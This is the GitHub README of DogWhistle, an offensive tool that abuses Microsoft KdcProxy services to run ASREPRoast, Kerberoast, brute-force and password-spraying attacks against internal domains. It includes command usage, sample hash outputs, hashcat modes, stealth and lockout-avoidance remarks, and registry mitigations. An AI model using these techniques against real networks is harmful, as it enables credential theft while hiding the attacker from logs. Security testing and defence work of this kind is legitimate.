Skip to content

Latest commit

 

History

History
131 lines (75 loc) · 7.3 KB

README.md

File metadata and controls

131 lines (75 loc) · 7.3 KB

DogWhistle

DogWhistle is a tool that can interact with Microsoft KdcProxy (KDC Proxy for Remote Access (syfuhs.net)) service. KdcProxy are commonly used with the following services to enable external clients on the internet to perform Kerberos requests to internal domain controllers:

  • Direct Access (tested)
    • Direct Access exposes the KdcProxy function and it is possible to interact with the service even if client certificate is required by DA
  • Remote Desktop Gateway (not tested yet but should be the same service)
  • Microsoft also recommends to setup KdcProxy when using SMB over QUIC (SMB over QUIC | Microsoft Docs).

Logging gets interesting because the AD authentication logs will have the source IP of the proxy. The only log I found is C:\Windows\System32\LogFiles\HTTPERR which only logs failed requests. So if you as an attacker don't want to expose your own IP performing malicous requests, you can proxy the requests to be stealthy.

The tool can use the KdcProxy to perform Kerberos attacks such as ASREPRoast and Kerberoast as well as regular bruteforce and password spraying.

Usage:

Ask TGT:           DogWhistle.exe asktgt <kdcproxy> <internal domain> <username> <password>

Bruteforce:        DogWhistle.exe bruteforce <kdcproxy> <internal domain> <username> <path-to-password-file>
                   BEWARE! KdcProxy will lock authentication for about 10 minutes after 11 invalid retries.
                   Internal password policys may lock account sooner!

Password spray:    DogWhistle.exe spray <kdcproxy> <internal domain> <path-to-username-file> <password>

ASREPRoast:        DogWhistle.exe asreproast <kdcproxy> <internal domain> <username-without-pre-auth-req>

Kerberoast:        DogWhistle.exe kerberoast <kdcproxy> <internal domain> <username> <password> <spn>

Scan:              DogWhistle.exe scan <host/ip/range> <port>

Examples:
.\DogWhistle.exe asktgt https://192.0.2.200/KdcProxy pwn.lab administrator P@ssw0rd!
.\DogWhistle.exe scan 192.0.2.1-254 443

This tool does not perform server certificate validation!

Discovery:

The default URL for KdcProxy is https://host/KdcProxy. KdcProxy will send TCP RST if it cannot interpret the request and will also send a TCP RST if it cannot perform a successful lookup for a SRV DNS record for the requested user domain/realm. DogWhistle can try to guess if a KdcProxy is available by sending a fake authentication request by using the scan option. If the server responds with RST instead of HTTP status code, it is probably a KdcProxy.

In addition, KdcProxies can sometimes be found in the following registry key on domain connected machines:

HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System\Kerberos\KdcProxy\ProxyServers

On a server, if KPSSVC is running it has a KdcProxy running. "netsh http show urlacl" can be used to view if KdcProxy is listening on the host.

ASREPRoast:

.\DogWhistle.exe asreproast <kdcproxy> <internal domain> <username-without-pre-auth-req>

Run hashcat with -m 18200

Example:

.\DogWhistle.exe asreproast https://192.0.2.200/KdcProxy pwn.lab administrator P@ssw0rd!
AS-REP Hash: [email protected

Kerberoast:

Requires valid domain username and password. Kerberoastble accounts are usually gathered via LDAP, so the output shows account unknown for now.

.\DogWhistle.exe kerberoast <kdcproxy> <internal domain> <username> <password> <spn>

Run hashcat with -m 13100

Example:

.\DogWhistle.exe kerberoast https://da.pwn.com/KdcProxy pwn.lab [email protected] P@ssw0rd! MSSQLSvc/sqlsrv.pwn.lab:1433
TGS-REP hash: $krb5tgs$23$*unknown$PWN.LAB$MSSQLSvc/sqlsrv.pwn.lab

Mitigation

There are two settings in the following registry path:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\KPSSVC\Settings

DisallowUnprotectedPasswordAuth - Requires Flexible Authentication Secure Tunneling (FAST)

HttpsClientAuth - Require client TLS certificate

Note that these settings may affect the services using the KdcProxy.

Even Microsoft disables these protection mechanisms:

REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\KPSSVC\Settings" /v HttpsClientAuth /t REG_DWORD /d 0x0 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Services\KPSSVC\Settings" /v DisallowUnprotectedPasswordAuth /t REG_DWORD /d 0x0 /f

https://github.com/MicrosoftDocs/windowsserverdocs/blob/main/WindowsServerDocs/storage/file-server/smb-over-quic.md

TODO

  • Figure out KdcProxy bruteforce lockout and implement timer so it doesn't trigger
  • Brute force mode for ASREPRoast and Kerberoast SPN
  • Better detection with DNS integration (Like burp collaborator)
  • Dig into Flexible Authentication Secure Tunneling (FAST)
  • Add other ETypes than RC4
  • Better command line handling

Credits

Inspired by Rubeus - https://github.com/GhostPack/Rubeus

Uses the fabulous Kerberos.NET library - https://github.com/dotnet/Kerberos.NET